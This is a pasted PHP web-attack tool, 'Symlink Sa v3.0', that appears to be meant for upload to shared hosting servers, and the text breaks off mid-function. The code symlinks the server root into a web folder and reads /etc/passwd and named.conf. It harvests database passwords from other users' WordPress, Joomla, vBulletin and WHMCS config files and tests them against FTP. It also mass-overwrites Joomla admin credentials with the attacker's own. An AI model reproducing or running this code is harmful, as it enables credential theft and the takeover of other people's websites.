Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

Symlink 3.0 privat

By: a guest on Nov 17th, 2012  |  syntax: None  |  size: 36.08 KB  |  views: 305  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. <?php
  2.  
  3.  
  4. /*
  5.  
  6.   .d8888. d88888b  .o88b.         db   d8b   db      .o88b.  .d88b.  .88b  d88.
  7.   88'  YP 88'     d8P  Y8         88   I8I   88     d8P  Y8 .8P  Y8. 88'YbdP`88
  8.   `8bo.   88ooooo 8P              88   I8I   88     8P      88    88 88  88  88
  9.     `Y8b. 88~~~~~ 8b      C8888D  Y8   I8I   88     8b      88    88 88  88  88
  10.   db   8D 88.     Y8b  d8         `8b d8'8b d8' db  Y8b  d8 `8b  d8' 88  88  88
  11.   `8888Y' Y88888P  `Y88P'          `8b8' `8d8'  VP   `Y88P'  `Y88P'  YP  YP  YP
  12.  
  13.  
  14.    author..............: s3n4t00r
  15.    home................: sec-w.com
  16.    twitter.............: @s3n4t00r
  17.    name tools..........: Symlink Sa v3.0
  18.  
  19. */
  20.  
  21.  
  22.  
  23. set_time_limit(0);
  24. error_reporting(0);
  25.  
  26.  
  27. $pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  28. $u = explode("/",$pageURL );
  29. $pageURL =str_replace($u[count($u)-1],"",$pageURL );
  30.  
  31. $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
  32. $u = explode("/",$pageFTP );
  33. $pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
  34.  
  35. ?>
  36.   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  37.     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  38.  
  39. <html xmlns="http://www.w3.org/1999/xhtml">
  40.  
  41. <head>
  42. <title>Symlink_Sa 3.0</title>
  43.  
  44. <style type="text/css">
  45.  
  46.   html,body {
  47.      margin: 0;
  48.      padding: 0;
  49.      outline: 0;
  50. }
  51. a{
  52.  
  53.  font-size: 13px;
  54.  
  55. }
  56.  
  57.  
  58. body {
  59.     direction: ltr;
  60.     background-color:#000000;
  61.         color: #00ff00;
  62.     text-align: center
  63. }
  64.  
  65.  
  66.  
  67. input,textarea,select{
  68. font-weight: bold;
  69. color: #000000;
  70. }
  71.  
  72. input,textarea,select:hover{
  73. box-shadow: 0px 0px 4px #00ff00;
  74. }
  75.  
  76.  
  77. .hedr {
  78.   font-family: Tahoma, Arial, sans-serif  ;
  79.   font-size: 22px;
  80.  
  81.  
  82. }
  83.  
  84. .cont a{
  85.  
  86.  text-decoration: none;
  87.  color:rgb(153, 153, 153);
  88.  font-family: Tahoma, Arial, sans-serif  ;
  89.  font-size: 16px;
  90.  text-shadow: 0px 0px 3px ;
  91. }
  92.  
  93. .cont a:hover{
  94.  
  95.  
  96.   color: #00ff00 ;
  97.   text-shadow:0px 0px 3px #00ff00 ;
  98.  
  99.  
  100. }
  101.  
  102. .tmp tr td{
  103.  
  104. border: solid 1px #00ff00;
  105.  
  106. padding: 2px ;
  107.   font-size: 13px;
  108. }
  109.  
  110. .tmp tr td a {
  111.   text-decoration: none;
  112.  
  113.  
  114.  
  115. }
  116.  
  117. .foter{
  118.   font-size: 9pt;
  119.   color: #00ff00 ;
  120.   text-align: center
  121. }
  122.  
  123. .tmp tr td:hover{
  124.  
  125. box-shadow: 0px 0px 4px #00ff00;
  126.  
  127. }
  128. .fot{
  129.  
  130. font-family:Tahoma, Arial, sans-serif;
  131.  
  132.   font-size: 11pt;
  133. }
  134. .for a : hover{
  135.  
  136. text-shadow: 0px 0px 1px #00ff00;
  137.  
  138. }
  139.  
  140.  
  141. .ir {
  142.   color: #00ff00;
  143. }
  144.  
  145.  
  146.  
  147. <body bgColor=#000000>
  148. <!--
  149. p.location {
  150.         color: #00ff00;
  151.         font-size: small;
  152. }
  153. h1 {
  154.         color: #00ff00;
  155. }
  156.  
  157. h2 {
  158.         color: #00ff00;
  159. }
  160.  
  161. h3 {
  162.         color: #00ff00;
  163. }
  164.  
  165. h4 {
  166.         color: #00ff00;
  167. }
  168. th {
  169.         background-color: #000000;
  170. input, select, textarea {
  171. background-color: #000000;
  172. border-style: solid;
  173. font-family: verdana, arial, sans-serif;
  174. font-size:small;
  175. color: blue;
  176. padding: 0px;
  177. }
  178. }
  179. td {
  180.         background-color: #000000;
  181. input, select, textarea {
  182. background-color: #000000;
  183. border-style: solid;
  184. font-family: verdana, arial, sans-serif;
  185. font-size:small;
  186. color: #00ff00;
  187. padding: 0px;
  188. }
  189.         font-size: small;
  190. }
  191. form {
  192.         margin-top: 0;
  193.         margin-bottom: 0;
  194. }
  195. a {
  196.         text-decoration:none;
  197.         color: #00ff00;
  198.         font-size:small;
  199. }
  200. A:link {
  201. COLOR:#00ff00;
  202. TEXT-DECORATION: none
  203. }
  204. A:visited {
  205. COLOR:#00ff00;
  206. TEXT-DECORATION: none
  207. }
  208. A:active {
  209. COLOR:#00ff00;
  210. TEXT-DECORATION: none
  211. }
  212. A:hover {
  213. color:#00ff00;
  214. TEXT-DECORATION: none
  215. }
  216. input, select, textarea {
  217. background-color: #000000;
  218. border-style: solid;
  219. font-family: verdana, arial, sans-serif;
  220. font-size:small;
  221. color: #00ff00;
  222. padding: 0px;
  223. }
  224. #tablenya, .tabelnya {
  225.         border-width:thin;
  226.         border-style:double;
  227.         border-spacing:0;
  228.         border-color:#00ff00;
  229. }
  230. body,td,th {
  231.         font-family: Verdana, Arial, Helvetica, sans-serif;
  232.         font-size:10px;
  233.         color: #00ff00;
  234. //-->
  235.  
  236. body {background-color:#000000; color:#000000;}
  237.  
  238. </style>
  239.  
  240. </head>
  241.  
  242. <body>
  243.  
  244. <div class='all'>
  245.  
  246.  
  247. <?php
  248.  
  249. @mkdir('sym',0777);
  250. $htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  251. $f =@fopen ('sym/.htaccess','w');
  252. fwrite($f , $htcs);
  253.  
  254.  
  255.  
  256. @symlink("/","sym/root");
  257.  
  258. $pg = basename(__FILE__);
  259.  
  260. echo '<br /><div class="hedr"> <center><img src=http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/"http://www.indojpg.com/images/8392.jpg"></center></div>' ;
  261.  
  262. echo '<div class="hedr"><br /><br /></div>' ;
  263.  
  264. echo '<div class="cont">
  265.  
  266. <font color="#00ff00">[<a href=http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/"?"> Home </a>]</font>
  267.  
  268. [<a href=http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/"?sws=sym"> User & Domains & Symlink </a>]
  269.  
  270. [<a href=http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/"?sws=sec"> Domains & Script </a>]
  271.  
  272. [ <a href=http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/"?sws=file"> Symlink File </a>]
  273.  
  274. [<a href=http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/"?sws=passwd"> Symlink Bypass </a>]
  275.  
  276. <br /><br />
  277.  
  278. [ <a href=http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/"?sws=read"> Bypass Read </a>]
  279.  
  280. [ <a href=http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/"?sws=joomla"> Mass Joomla </a>]
  281.  
  282. [ <a href=http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/"?sws=wp"> Mass WordPress </a>]
  283.  
  284. [ <a href=http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/"?sws=vb"> Mass vBulletin </a>]
  285.  
  286. [ <a href=http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/"?sws=help"> Information </a>]</font>
  287.  
  288. <br /><br />
  289. [ <a href=http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/"?sws=configfinder"> Config Symlink </a>]
  290.  
  291.  
  292.  
  293.  
  294.  
  295.  
  296. </div>';
  297.  
  298. if(isset($_REQUEST['sws']))
  299. {
  300.  
  301. switch ($_REQUEST['sws'])
  302. {
  303.  
  304.  
  305.  
  306.  
  307. case 'configfinder';
  308. echo '<td width="24%" align="left" valign="top" id="kolomkiri">
  309.         <br />
  310.         <table width="100%" border="0" cellspacing="0" cellpadding="2" class="tabelnya">
  311.   <tr>
  312.     <td class="judul"></td>
  313.   </tr>
  314.   <tr>
  315.     <td class="isi">';
  316.  
  317.  
  318. /** ScreaM-Crew cPanel Cracker **/
  319. echo '';
  320. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
  321. set_time_limit(0);
  322. ###################
  323. @$passwd = fopen('/etc/passwd','r');
  324. if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b><br><br>Contact : <a href=http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/"http://scream-crew.us</a>'); }
  325. $pub = array();
  326. $users = array();
  327. $conf = array();
  328. $i = 0;
  329. while(!feof($passwd))
  330. {
  331.     $str = fgets($passwd);
  332.         if ($i > 35)
  333.         {
  334.             $pos = strpos($str,':');
  335.             $username = substr($str,0,$pos);
  336.             $dirz = '/home/'.$username.'/public_html/';
  337.             if (($username != ''))
  338.             {
  339.                 if (is_readable($dirz))
  340.                 {
  341.                     array_push($users,$username);
  342.                     array_push($pub,$dirz);
  343.                 }
  344.             }
  345.           }
  346.     $i++;
  347. }
  348. ###################
  349. echo '<br><br><textarea cols="100" rows="20" style="background-color:#000000; color:#00FF00" readonly="readonly">';
  350. echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
  351. echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
  352. echo "[~] Searching for passwords in config files...\n\n";
  353. foreach ($users as $user)
  354. {
  355.     $path = "/home/$user/public_html/";
  356.     read_dir($path,$user);
  357. }
  358. echo "\n[+] Done\n";
  359. function read_dir($path,$username)
  360. {
  361.     if ($handle = opendir($path))
  362.     {
  363.         while (false !== ($file = readdir($handle)))
  364.         {
  365.             $fpath = "$path$file";
  366.             if (($file != '.') and ($file != '..'))
  367.             {
  368.                 if (is_readable($fpath))
  369.                 {
  370.                     $dr = $fpath."/";
  371.                     if (is_dir($dr))
  372.                     {
  373.                         read_dir($dr,$username);
  374.                     }
  375.                     else
  376.                     {
  377.                          if (
  378.                              ($file=='config.php')
  379.                          or ($file=='config.inc.php')
  380.                          or ($file=='conf.php')
  381.                          or ($file=='settings.php')
  382.                          or ($file=='configuration.php')
  383.                          or ($file=='wp_config.php')
  384.                          or ($file=='wp-config.php')
  385.                           or ($file=='inc.php')
  386.                          or ($file=='setup.php')
  387.                          or ($file=='dbconf.php')
  388.                          or ($file=='dbconfig.php')
  389.                          or ($file=='db.inc.php')
  390.                          or ($file=='dbconnect.php')
  391.                          or ($file=='connect.php')
  392.                          or ($file=='common.php')
  393.                          or ($file=='config_global.php')
  394.                          or ($file=='db.php')
  395.                          or ($file=='connect.inc.php')
  396.                          or ($file=='e107_config.php')
  397.                          or ($file=='dbconnect.inc.php'))
  398.                         {
  399.                             $pass = get_pass($fpath);
  400.                             if ($pass != '')
  401.                             {
  402.                                 echo "[+] $fpath\n$pass\n";
  403.                                 ftp_check($username,$pass);
  404.                             }
  405.                         }
  406.                     }
  407.                 }
  408.             }
  409.         }
  410.     }
  411. }
  412. function get_pass($link)
  413. {
  414.     @$config = fopen($link,'r');
  415.     while(!feof($config))
  416.     {
  417.         $line = fgets($config);
  418.         if (strstr($line,'pass')
  419.         or strstr($line,'pwd')
  420.         or strstr($line,'db_pass')
  421.         or strstr($line,'dbpass')
  422.         or strstr($line,'passwd'))
  423.         {
  424.             if (strrpos($line,'"'))
  425.             {
  426.                 preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
  427.                 $pass = str_replace("]=\"","",$pass);
  428.             }
  429.  
  430.             else
  431.                 preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
  432.                 $pass = str_replace("]='","",$pass);
  433.             return $pass[2];
  434.         }
  435.     }
  436. }
  437. function ftp_check($login,$pass)
  438. {
  439.     @$ftp = ftp_connect('127.0.0.1');
  440.     if ($ftp)
  441.     {
  442.         @$res = ftp_login($ftp,$login,$pass);
  443.         if ($res)
  444.         {
  445.             echo '[FTP] '.$login.':'.$pass."  Success !\n\n";
  446.  
  447.         }
  448.         else ftp_quit($ftp);
  449.     }
  450. }
  451. echo '</textarea>';
  452.  
  453. echo '</td></tr></table>';
  454. break;
  455.  
  456. /// Domains + Scripts  ///
  457.  
  458. case 'sec':
  459.  
  460. if(!@is_file('named.txt')){
  461.  
  462. $d00m = @file("/etc/named.conf");
  463.  
  464. }else{
  465.  
  466. $d00m = @file("named.txt");
  467.  
  468.  
  469. }
  470. if(!$d00m)
  471. {
  472.  
  473.                 die ("<meta http-equiv='refresh' content='0; url=http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/video.php?sws=read'/>");
  474. }
  475. else
  476.  
  477. {
  478. echo "<div class='tmp'>
  479. <table align='center' width='40%'><td> Domains </td><td> Script </td>";
  480. foreach($d00m as $dom){
  481.  
  482. flush();
  483. flush();
  484.  
  485.  
  486.  
  487. if(eregi("zone",$dom)){
  488.  
  489. @preg_match_all('#zone "(.*)"#', $dom, $domsws);
  490.  
  491. flush();
  492.  
  493. if(@strlen(trim($domsws[1][0])) > 2){
  494.  
  495. $user = @posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  496.  
  497. ///////////////////////////////////////////////////////////////////////////////////
  498.  
  499. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
  500. $wpp=@get_headers($wpl);
  501. $wp=$wpp[0];
  502.  
  503. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
  504. $wpp2=@get_headers($wp2);
  505. $wp12=$wpp2[0];
  506.  
  507. ///////////////////////////////
  508.  
  509. $jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
  510. $joo=@get_headers($jo1);
  511. $jo=$joo[0];
  512.  
  513.  
  514. $jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
  515. $joo2=@get_headers($jo2);
  516. $jo12=$joo2[0];
  517.  
  518. ////////////////////////////////
  519.  
  520. $vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
  521. $vbb=@get_headers($vb1);
  522. $vb=$vbb[0];
  523.  
  524. $vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
  525. $vbb2=@get_headers($vb2);
  526. $vb12=$vbb2[0];
  527.  
  528. $vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
  529. $vbb3=@get_headers($vb3);
  530. $vb13=$vbb3[0];
  531.  
  532. /////////////////
  533.  
  534. $wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
  535. $whh2= @get_headers($wh1);
  536. $wh=$whh2[0];
  537.  
  538. $wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
  539. $whh2= @get_headers($wh2);
  540. $wh12=$whh2[0];
  541.  
  542. $wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
  543. $whh3= @get_headers($wh3);
  544. $wh13=$whh3[0];
  545.  
  546. $wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
  547. $whh5= @get_headers($wh5);
  548. $wh15=$whh5[0];
  549.  
  550. $wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
  551. $whh4= @get_headers($wh4);
  552. $wh14=$whh4[0];
  553.  
  554.  
  555.  
  556. ////////////////////////////////////////////////////////////////////////////////
  557.  
  558.  ////////// Wordpress ////////////
  559.  
  560. $pos = strpos($wp, "200");
  561. $config="� ";
  562.  
  563. if (strpos($wp, "200") == true )
  564. {
  565.  $config="<a href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/".$wpl."' target='_blank'>Wordpress</a>";
  566. }
  567. elseif (strpos($wp12, "200") == true)
  568. {
  569.   $config="<a href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/".$wp2."' target='_blank'>Wordpress</a>";
  570. }
  571.  
  572. ///////////WHMCS////////
  573.  
  574. elseif (strpos($jo, "200")  == true and strpos($wh15, "200")  == true )
  575. {
  576.   $config=" <a href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/".$wh5."' target='_blank'>WHMCS</a>";
  577.  
  578. }
  579. elseif (strpos($wh12, "200")  == true)
  580. {
  581.   $config =" <a href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/".$wh2."' target='_blank'>WHMCS</a>";
  582. }
  583.  
  584. elseif (strpos($wh13, "200")  == true)
  585. {
  586.   $config =" <a href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/".$wh3."' target='_blank'>WHMCS</a>";
  587.  
  588. }
  589.  
  590. ///////// Joomla to 4 ///////////
  591.  
  592. elseif (strpos($jo, "200")  == true)
  593. {
  594.   $config=" <a href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/".$jo1."' target='_blank'>Joomla</a>";
  595. }
  596.  
  597. elseif (strpos($jo12, "200")  == true)
  598. {
  599.   $config=" <a href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/".$jo2."' target='_blank'>Joomla</a>";
  600. }
  601.  
  602. //////////vBulletin to 4 ///////////
  603.  
  604. elseif (strpos($vb, "200")  == true)
  605. {
  606.   $config=" <a href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/".$vb1."' target='_blank'>vBulletin</a>";
  607. }
  608.  
  609. elseif (strpos($vb12, "200")  == true)
  610. {
  611.   $config=" <a href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/".$vb2."' target='_blank'>vBulletin</a>";
  612. }
  613.  
  614. elseif (strpos($vb13, "200")  == true)
  615. {
  616.   $config=" <a href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/".$vb3."' target='_blank'>vBulletin</a>";
  617. }
  618.  
  619. else
  620. {
  621.  continue;
  622. }
  623. flush();
  624. flush();
  625.  
  626. /////////////////////////////////////////////////////////////////////////////////////
  627.  
  628.  
  629.  
  630. $site = $user['name'] ;
  631.  
  632.  
  633.  
  634. flush();
  635.  
  636. echo "<tr><td><a href=http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
  637. <td>".$config."</td></tr>"; flush();
  638.  
  639. }
  640. }
  641. }
  642. }
  643.  
  644.  
  645.  
  646.  
  647. break;
  648.  
  649.  
  650. /// user + domine + symlink  ///
  651.  
  652. case 'sym':
  653.  
  654. if(!is_file('named.txt')){
  655.  
  656. $d00m = @file("/etc/named.conf");
  657.  
  658. }else{
  659.  
  660. $d00m = @file("named.txt");
  661.  
  662.  
  663. }
  664. if(!$d00m)
  665. {
  666.  
  667.                 die ("<meta http-equiv='refresh' content='0; url=http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/video.php?sws=read'/>");
  668. }
  669. else
  670.  
  671. {
  672. echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
  673. foreach($d00m as $dom){
  674.  
  675. if(eregi("zone",$dom)){
  676.  
  677. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  678.  
  679. flush();
  680.  
  681. if(strlen(trim($domsws[1][0])) > 2){
  682.  
  683. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  684.  
  685. flush();
  686.  
  687.  
  688.  
  689. $site = $user['name'] ;
  690.  
  691.  
  692. @symlink("/","sym/root");
  693.  
  694. $site = $domsws[1][0];
  695.  
  696. $ir = 'ir';
  697.  
  698. $il = 'il';
  699.  
  700. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
  701. {
  702. $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
  703. }
  704.  
  705.  
  706. echo "
  707. <tr>
  708.  
  709. <td>
  710. <div class='dom'><a target='_blank' href=http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.".$domsws[1][0]."/>".$site." </a> </div>
  711. </td>
  712.  
  713.  
  714. <td>
  715. ".$user['name']."
  716. </td>
  717.  
  718.  
  719.  
  720.  
  721.  
  722.  
  723. <td>
  724. <a href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
  725. </td>
  726.  
  727.  
  728. </tr></div> ";
  729.  
  730.  
  731. flush();
  732. flush();
  733.  
  734. }
  735. }
  736. }
  737. }
  738.  
  739.  
  740.  
  741.  
  742. break;
  743.  
  744.  
  745. /// file  symlink ///
  746.  
  747. case 'file':
  748.  
  749. echo'
  750. The file path to symlink
  751.  
  752. <br /><br />
  753. <form method="post">
  754. <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
  755. <input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
  756. <input type="submit" value="symlink" name="symlink" /> <br /><br />
  757.  
  758.  
  759.  
  760. </form>
  761. ';
  762.  
  763. $pfile = $_POST['file'];
  764. $symfile = $_POST['symfile'];
  765. $symlink = $_POST['symlink'];
  766.  
  767. if ($symlink)
  768. {
  769.  
  770.  
  771. @mkdir('sym1',0777);
  772. $c  = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n  AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
  773. $f =@fopen ('sym1/.htaccess','w');
  774. @fwrite($f , $c);
  775.  
  776. @symlink("$pfile","sym1/$symfile");
  777.  
  778. echo '<br /><a target="_blank" href=http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/"sym1/'.$symfile.'" >'.$symfile.'</a>';
  779.  
  780. }
  781.  
  782.  
  783.  
  784. break;
  785.  
  786. /// bypass read
  787.  
  788. case 'read':
  789.  
  790. echo "read /etc/named.conf";
  791. echo "<br /><br /><form method='post' action='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/video.php?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
  792. flush();
  793. flush();
  794.  
  795.  
  796. $file = '/etc/named.conf';
  797.  
  798.  
  799. $r3ad = @fopen($file, 'r');
  800. if ($r3ad){
  801. $content = @fread($r3ad, @filesize($file));
  802. echo "".htmlentities($content)."";
  803. }
  804. else if (!$r3ad)
  805. {
  806. $r3ad = @show_source($file) ;
  807. }
  808. else if (!$r3ad)
  809. {
  810. $r3ad = @highlight_file($file);
  811. }
  812. else if (!$r3ad)
  813. {
  814. $sm = @symlink($file,'sym.txt');
  815.  
  816.  
  817. if ($sm){
  818. $r3ad = @fopen('sym/sym.txt', 'r');
  819. $content = @fread($r3ad, @filesize($file));
  820. echo "".htmlentities($content)."";
  821.  
  822. }
  823. }
  824.  
  825.  
  826.  
  827. echo "</textarea><br /><br /><input  type='submit' value='Save'/> </form>";
  828.  
  829.  
  830. if(isset($_GET['save'])){
  831.  
  832.  
  833. $cont = stripcslashes($_POST['file']);
  834.  
  835. $f = fopen('named.txt','w');
  836.  
  837. $w = fwrite($f,$cont);
  838.  
  839.                   if($w){
  840.  
  841.                   echo '<br />save has been successfully';
  842.  
  843.                   }
  844.  
  845. fclose($f);
  846.  
  847.  
  848.  
  849.  
  850. }
  851.  
  852.  
  853.  
  854. break;
  855.  
  856. // passwd
  857.  
  858. case 'passwd':
  859.  
  860. if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
  861.  
  862.  
  863. $cont = stripcslashes($_POST['file']);
  864.  
  865. if(!file_exists('passwd.txt')){
  866.  
  867. $f = @fopen('passwd.txt','w');
  868.  
  869. $w = @fwrite($f,$cont);
  870.  
  871. fclose($f);
  872. }
  873. if($w or @filesize('passwd.txt') > 0){
  874. // * SHOW * //
  875.  
  876. echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
  877. flush();
  878.  
  879. $fil3 = file('passwd.txt');
  880.  
  881. foreach ($fil3 as $f){
  882.  
  883.      $u=explode(':', $f);
  884.      $user = $u['0'];
  885.  
  886.  
  887.  
  888. echo "
  889. <tr>
  890.  
  891.  
  892.  
  893. <td width='15%'>
  894. $user
  895. </td>
  896.  
  897.  
  898.  
  899.  
  900.  
  901.  
  902. <td width='10%'>
  903. <a href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/sym/root/home/$user/public_html' target='_blank'>Symlink </a>
  904. </td>
  905.  
  906. <td width='10%'>
  907. <a href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
  908. </td>
  909.  
  910.  
  911.  
  912. </tr></div> ";
  913.  
  914.  
  915. flush();
  916. flush();
  917.  
  918.  
  919. }
  920.  
  921.  
  922.  
  923.  
  924.  
  925.  
  926. die ("</tr></div>");
  927.  
  928.  
  929.                   }
  930.  
  931.  
  932.  
  933.  
  934.  
  935. }
  936.  
  937.  
  938.  
  939. echo "read /etc/passwd";
  940. echo "<br /><br /><form method='post' action='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/video.php?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
  941. flush();
  942.  
  943. $file = '/etc/passwd';
  944.  
  945.  
  946. $r3ad = @fopen($file, 'r');
  947. if ($r3ad){
  948. $content = @fread($r3ad, @filesize($file));
  949. echo "".htmlentities($content)."";
  950. }
  951. elseif(!$r3ad)
  952. {
  953. $r3ad = @show_source($file) ;
  954. }
  955. elseif(!$r3ad)
  956. {
  957. $r3ad = @highlight_file($file);
  958. }
  959. elseif(!$r3ad)
  960. {
  961.  
  962.                                             for($uid=0;$uid<1000;$uid++){
  963.                                              $ara = posix_getpwuid($uid);
  964.                                                if (!empty($ara)) {
  965.                                                   while (list ($key, $val) = each($ara)){
  966.                                                     print "$val:";
  967.                                                   }
  968.                                                   print "\n";
  969.                                                  }
  970.  
  971.                                         }
  972.  
  973.  }
  974.  
  975.  
  976. flush();
  977.  
  978.  
  979. echo "</textarea><br /><br /><input  type='submit' value='� � symlink� � '/> </form>";
  980. flush();
  981.  
  982. break;
  983.  
  984.  
  985.  
  986. case 'joomla':
  987.  
  988. /////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////
  989.  
  990.  
  991. if(isset($_POST['s'])){
  992.  
  993. $file = @file_get_contents('joomla.txt');
  994.  
  995. $ex   = explode("\n",$file);
  996.  
  997. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  998. flush();
  999.  
  1000.  
  1001. foreach ($ex as $exp){
  1002.  
  1003. $es   = explode("||",$exp);
  1004.  
  1005. $config = $es[0];
  1006.  
  1007. $domin = $es[1];
  1008.  
  1009. $domins = trim($domin).'';
  1010.  
  1011. $readconfig  = @file_get_contents(trim($config));
  1012.  
  1013. if(ereg('JConfig',$readconfig)){
  1014.  
  1015.  
  1016.  
  1017. $pass    =  ex($readconfig,'$password = \'',"';");
  1018.  
  1019. $userdb  =  ex($readconfig,'$user = \'',"';");
  1020.  
  1021. $db      =  ex($readconfig,'$db = \'',"';");
  1022.  
  1023. $fix     =  ex($readconfig,'$dbprefix = \'',"';");
  1024.  
  1025. $tab     =  $fix.'users';
  1026.  
  1027.  
  1028. $con     = @mysql_connect('localhost',$userdb,$pass);
  1029.  
  1030. $db      = @mysql_select_db($db,$con);
  1031.  
  1032. $query   = @mysql_query("UPDATE `$tab`  SET `username` ='ScreaM-Crew'");
  1033.  
  1034.  
  1035. $query3  = @mysql_query("UPDATE `$tab`  SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");
  1036.  
  1037.  
  1038. if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [ScreaM-Crew] pass [1]</b>';}else{$r = '<b style="color:red">failed</b>';}
  1039.  
  1040. $domins = trim($domin).'';
  1041.  
  1042. echo "<tr>
  1043. <td><a target='_blank' href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://$domins'>$domin</a></td>
  1044. <td><a target='_blank' href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/$config'>config</a></td><td>".$r."</td></tr>";
  1045. flush();
  1046.  
  1047.  
  1048.  
  1049. }else{
  1050.  
  1051. echo "<tr>
  1052. <td><a target='_blank' href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://$domins'>$domin</a></td>
  1053. <td><a target='_blank' href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://$exp'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
  1054. flush();
  1055.  
  1056. }
  1057.  
  1058. }
  1059.  
  1060.  
  1061.  
  1062.  
  1063.  
  1064.  
  1065.  
  1066.  
  1067.  
  1068. die();
  1069.  
  1070. }
  1071.  
  1072. if(!is_file('named.txt')){
  1073.  
  1074. $d00m = @file("/etc/named.conf");
  1075.  
  1076. flush();
  1077.  
  1078.  
  1079. }else{
